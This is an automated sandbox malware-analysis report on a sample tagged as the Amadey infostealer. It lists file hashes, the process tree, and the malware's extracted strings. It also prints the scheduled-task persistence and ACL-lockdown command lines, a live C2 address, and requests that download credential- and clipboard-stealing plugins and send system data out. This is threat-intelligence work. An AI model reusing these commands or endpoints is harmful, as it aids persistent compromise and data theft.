File name: | powes.exe |
Full analysis: | https://app.any.run/tasks/23d5db3f-c7b7-499e-adc1-b216e7c27b0b |
Verdict: | Malicious activity |
Threats: | Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks. |
Analysis date: | April 01, 2023, 14:19:21 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
MD5: | DA453134EB08FCD88431CB7CCF97C98A |
SHA1: | 56977416D77214C6EACEC50A23077AB1AD1B8E3A |
SHA256: | F08484E803EC708FE0082DDA9E6C5CC9F9CBF7405972F03C17AF93C1DFF7E84C |
SSDEEP: | 98304:E/B7WLWofXOBm5LuybBkGI1WzF2+PFmtmGMlGEkJJ5rGDhXK:i7Wa2ckna1yPMjVZM |
.exe | | | Generic CIL Executable (.NET, Mono, etc.) (63.1) |
---|---|---|
.exe | | | Win64 Executable (generic) (23.8) |
.dll | | | Win32 Dynamic Link Library (generic) (5.6) |
.exe | | | Win32 Executable (generic) (3.8) |
.exe | | | Generic Win/DOS Executable (1.7) |
AssemblyVersion: | 1.0.0.0 |
---|---|
ProductVersion: | 1.0.0.0 |
OriginalFileName: | powes.exe |
LegalCopyright: | |
InternalName: | powes.exe |
FileVersion: | 1.0.0.0 |
FileDescription: | |
CharacterSet: | Unicode |
LanguageCode: | Neutral |
FileSubtype: | - |
ObjectFileType: | Executable application |
FileOS: | Win32 |
FileFlags: | (none) |
FileFlagsMask: | 0x003f |
ProductVersionNumber: | 1.0.0.0 |
FileVersionNumber: | 1.0.0.0 |
Subsystem: | Windows GUI |
SubsystemVersion: | 4 |
ImageVersion: | - |
OSVersion: | 4 |
EntryPoint: | 0x45f28e |
UninitializedDataSize: | - |
InitializedDataSize: | 2048 |
CodeSize: | 4576256 |
LinkerVersion: | 11 |
PEType: | PE32 |
ImageFileCharacteristics: | Executable, 32-bit |
TimeStamp: | 2023:04:01 09:43:11+00:00 |
MachineType: | Intel 386 or later, and compatibles |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 01-Apr-2023 09:43:11 |
FileDescription: | - |
FileVersion: | 1.0.0.0 |
InternalName: | powes.exe |
LegalCopyright: | - |
OriginalFilename: | powes.exe |
ProductVersion: | 1.0.0.0 |
Assembly Version: | 1.0.0.0 |
Magic number: | MZ |
---|---|
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000080 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 3 |
Time date stamp: | 01-Apr-2023 09:43:11 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
---|---|---|---|---|---|
.text | 0x00002000 | 0x0045D294 | 0x0045D400 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 7.8827 |
.rsrc | 0x00460000 | 0x000004D0 | 0x00000600 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 3.69347 |
.reloc | 0x00462000 | 0x0000000C | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 0.10191 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 5.00112 | 490 | UNKNOWN | UNKNOWN | RT_MANIFEST |
mscoree.dll |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1036 | "C:\Users\admin\AppData\Local\Temp\powes.exe" | C:\Users\admin\AppData\Local\Temp\powes.exe | explorer.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Description: Exit code: 0 Version: 1.0.0.0 Modules
| |||||||||||||||
2032 | "C:\Users\admin\AppData\Local\Temp\Player3.exe" | C:\Users\admin\AppData\Local\Temp\Player3.exe | powes.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
1844 | "C:\Users\admin\AppData\Local\Temp\ss31.exe" | C:\Users\admin\AppData\Local\Temp\ss31.exe | powes.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Modules
| |||||||||||||||
840 | "C:\Users\admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" | C:\Users\admin\AppData\Local\Temp\16de06bfb4\nbveek.exe | Player3.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Modules
Amadey(PID) Process(840) nbveek.exe Strings (116)SCHTASKS /Create /SC MINUTE /MO 1 /TN /TR " " /F SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup Rem cmd /C RMDIR /s/q SOFTWARE\Microsoft\Windows\CurrentVersion\Run rundll32 /Delete /TN " Programs SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders %USERPROFILE% \App POST GET id= &vs= &sd= &os= &bi= &ar= &pc= &un= &dm= &av= &lv= &og= cred.dll|clip.dll| d1 e1 e0 Main http:// https:// exe dll cmd ps1 <c> <d> Plugins/ +++ # | &unit= = shell32.dll kernel32.dll GetNativeSystemInfo ProgramData\ AVAST Software Avira Kaspersky Lab ESET Panda Security Doctor Web AVG 360TotalSecurity Bitdefender Norton Sophos Comodo WinDefender 0123456789 rb wb Content-Type: multipart/form-data; boundary=---- ------ Content-Disposition: form-data; name="data"; filename=" "
Content-Type: application/octet-stream ------ -- ?scr=1 .jpg Content-Type: application/x-www-form-urlencoded SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName ComputerName abcdefghijklmnopqrstuvwxyz0123456789-_ -unicode- SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\ SYSTEM\ControlSet001\Services\BasicDisplay\Video VideoID \0000 DefaultSettings.XResolution DefaultSettings.YResolution SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductName 2019 2022 2016 CurrentBuild && echo Y|CACLS " " /P " :N" CACLS " " /P " :R" /E :F" /E &&Exit ..\ \ ::: rundll32.exe /k "taskkill /f /im " " && timeout 1 && del && Exit" " && ren && Powershell.exe -executionpolicy remotesigned -File " " Options Drop namenbveek.exe Drop directory16de06bfb4 Version3.65 C2 (1)http://77.73.134.27 | |||||||||||||||
1504 | "C:\Users\admin\AppData\Local\Temp\XandETC.exe" | C:\Users\admin\AppData\Local\Temp\XandETC.exe | — | powes.exe | |||||||||||
User: admin Company: Google Inc. Integrity Level: MEDIUM Description: Google Chrome Exit code: 3221226540 Version: 90,1,32,10 Modules
| |||||||||||||||
304 | "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F | C:\Windows\SysWOW64\schtasks.exe | — | nbveek.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2184 | "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "admin:N"&&CACLS "nbveek.exe" /P "admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "admin:N"&&CACLS "..\16de06bfb4" /P "admin:R" /E&&Exit | C:\Windows\SysWOW64\cmd.exe | — | nbveek.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
2436 | C:\Windows\system32\cmd.exe /S /D /c" echo Y" | C:\Windows\SysWOW64\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
2560 | CACLS "nbveek.exe" /P "admin:N" | C:\Windows\SysWOW64\cacls.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Control ACLs Program Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2684 | CACLS "nbveek.exe" /P "admin:R" /E | C:\Windows\SysWOW64\cacls.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Control ACLs Program Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
|
(PID) Process: | (1036) powes.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (1036) powes.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (1036) powes.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (1036) powes.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (2032) Player3.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (2032) Player3.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (2032) Player3.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (2032) Player3.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (1844) ss31.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
Operation: | write | Name: | ProxyEnable |
Value: 0 | |||
(PID) Process: | (1844) ss31.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
Operation: | write | Name: | SavedLegacySettings |
Value: 460000008B000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2032 | Player3.exe | C:\Users\admin\AppData\Local\Temp\16de06bfb4\nbveek.exe | executable | |
MD5:43A3E1C9723E124A9B495CD474A05DCB | SHA256:619BBBC9E9DDD1F6B7961CACB33D99C8F558499A33751B28D91085AAB8CB95AB | |||
1036 | powes.exe | C:\Users\admin\AppData\Local\Temp\Player3.exe | executable | |
MD5:43A3E1C9723E124A9B495CD474A05DCB | SHA256:619BBBC9E9DDD1F6B7961CACB33D99C8F558499A33751B28D91085AAB8CB95AB | |||
840 | nbveek.exe | C:\Users\admin\AppData\Local\Temp\896776584425 | image | |
MD5:C29C44997ED442243C9344076E92A6BB | SHA256:B5A63D269C1032DE729202BA7050685F28C92DA2C8F3289FE0AEC3FF38DC5BFF | |||
840 | nbveek.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D2U1WPAC\clip64[1].dll | executable | |
MD5:D3074D3A19629C3C6A533C86733E044E | SHA256:B1F486289739BADF85C2266B7C2BBBC6C620B05A6084081D09D0911C51F7C401 | |||
1036 | powes.exe | C:\Users\admin\AppData\Local\Temp\ss31.exe | executable | |
MD5:70336369523D7426108C4BF0CFAD3845 | SHA256:B14E0E157B905CA0B38EB97543A72959D8308FA649D37510D5E94C7B624A696B | |||
2284 | powershell.exe | C:\Users\admin\AppData\Local\Temp\nkgmluth.lwh.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
840 | nbveek.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\cred64[1].dll | executable | |
MD5:2C4E958144BD089AA93A564721ED28BB | SHA256:B597B1C638AE81F03EC4BAAFA68DDA316D57E6398FE095A58ECC89E8BCC61855 | |||
2416 | powershell.exe | C:\Users\admin\AppData\Local\Temp\jndwgnav.wx1.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
1600 | powershell.exe | C:\Users\admin\AppData\Local\Temp\oulmrqg1.znv.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
2416 | powershell.exe | C:\Users\admin\AppData\Local\Temp\t0gzyq01.rv1.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
840 | nbveek.exe | POST | 200 | 77.73.134.27:80 | http://77.73.134.27/8bmdh3Slb2/index.php?scr=1 | KZ | — | — | malicious |
1844 | ss31.exe | GET | 200 | 154.221.31.191:80 | http://count.iiagjaggg.com/check/safe | HK | text | 96 b | malicious |
840 | nbveek.exe | GET | 200 | 77.73.134.27:80 | http://77.73.134.27/8bmdh3Slb2/Plugins/cred64.dll | KZ | executable | 1.02 Mb | malicious |
3020 | powershell.exe | GET | 304 | 178.79.242.11:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?6735b6e27a18b74a | DE | — | — | whitelisted |
1844 | ss31.exe | GET | 200 | 103.100.211.218:80 | http://bz.bbbeioaag.com/sts/bimage.jpg | HK | image | 1.45 Mb | malicious |
840 | nbveek.exe | GET | 200 | 77.73.134.27:80 | http://77.73.134.27/8bmdh3Slb2/Plugins/clip64.dll | KZ | executable | 89.0 Kb | malicious |
840 | nbveek.exe | POST | 200 | 77.73.134.27:80 | http://77.73.134.27/8bmdh3Slb2/index.php | KZ | text | 6 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1844 | ss31.exe | 157.240.253.35:443 | www.facebook.com | FACEBOOK | DE | suspicious |
1844 | ss31.exe | 103.100.211.218:80 | bz.bbbeioaag.com | YISU CLOUD LTD | HK | malicious |
1844 | ss31.exe | 154.221.31.191:80 | count.iiagjaggg.com | YISU CLOUD LTD | HK | malicious |
840 | nbveek.exe | 77.73.134.27:80 | — | Partner LLC | KZ | malicious |
3020 | powershell.exe | 178.79.242.11:80 | ctldl.windowsupdate.com | LLNW | DE | suspicious |
2956 | conhost.exe | 92.222.217.165:14433 | xmr-eu2.nanopool.org | OVH SAS | FR | unknown |
Domain | IP | Reputation |
---|---|---|
bz.bbbeioaag.com |
| malicious |
www.facebook.com |
| whitelisted |
count.iiagjaggg.com |
| malicious |
ctldl.windowsupdate.com |
| whitelisted |
xmr-eu2.nanopool.org |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
1844 | ss31.exe | A Network Trojan was detected | AV INFO Suspicious UA HTTPREAD |
840 | nbveek.exe | A Network Trojan was detected | AV TROJAN Agent.DHOA System Info Exfiltration |
840 | nbveek.exe | Unknown Classtype | ET MALWARE Amadey CnC Check-In |
840 | nbveek.exe | A Network Trojan was detected | ET MALWARE Amadey Bot Activity (POST) |
1844 | ss31.exe | Potentially Bad Traffic | ET HUNTING Double User-Agent (User-Agent User-Agent) |
840 | nbveek.exe | Potentially Bad Traffic | ET INFO Dotted Quad Host DLL Request |
840 | nbveek.exe | Potential Corporate Privacy Violation | AV POLICY HTTP request for .dll file with no User-Agent |
840 | nbveek.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
840 | nbveek.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
840 | nbveek.exe | Potentially Bad Traffic | ET INFO Dotted Quad Host DLL Request |